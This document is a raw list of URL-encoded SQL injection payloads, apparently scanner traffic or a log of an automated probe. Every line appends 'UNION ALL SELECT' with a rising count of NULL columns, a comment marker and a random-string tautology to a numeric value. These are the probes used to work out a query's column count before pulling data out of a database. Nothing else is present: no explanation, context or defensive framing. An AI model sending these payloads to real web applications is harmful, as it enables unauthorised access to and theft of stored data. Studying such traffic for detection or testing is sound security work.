1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22ZLde%22%3D%22ZLde 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22KhVq%22%3D%22KhVq 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22GwVR%22%3D%22GwVR 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22ByPd%22%3D%22ByPd 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22penC%22%3D%22penC 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22qNkk%22%3D%22qNkk 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22wCta%22%3D%22wCta 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22WvGR%22%3D%22WvGR 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22yZdd%22%3D%22yZdd 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22MUES%22%3D%22MUES 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22JGgl%22%3D%22JGgl 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22XCVj%22%3D%22XCVj 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22crte%22%3D%22crte 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22trpw%22%3D%22trpw 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22OIYm%22%3D%22OIYm 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22vIqd%22%3D%22vIqd 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22nGCm%22%3D%22nGCm 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22FmyY%22%3D%22FmyY 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22ZrZS%22%3D%22ZrZS 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22itNe%22%3D%22itNe 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22hoMf%22%3D%22hoMf 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22QMTI%22%3D%22QMTI 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22JIKH%22%3D%22JIKH 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22NYsb%22%3D%22NYsb 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22CaDs%22%3D%22CaDs 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22cmYe%22%3D%22cmYe 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22uLtn%22%3D%22uLtn 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22pwxX%22%3D%22pwxX 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22pSyz%22%20LIKE%20%22pSyz 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22fvft%22%20LIKE%20%22fvft 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22Gdgs%22%20LIKE%20%22Gdgs 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22jHXj%22%20LIKE%20%22jHXj 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22FfXE%22%20LIKE%20%22FfXE 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22Upvt%22%20LIKE%20%22Upvt 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22Jdaw%22%20LIKE%20%22Jdaw 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22lfQa%22%20LIKE%20%22lfQa 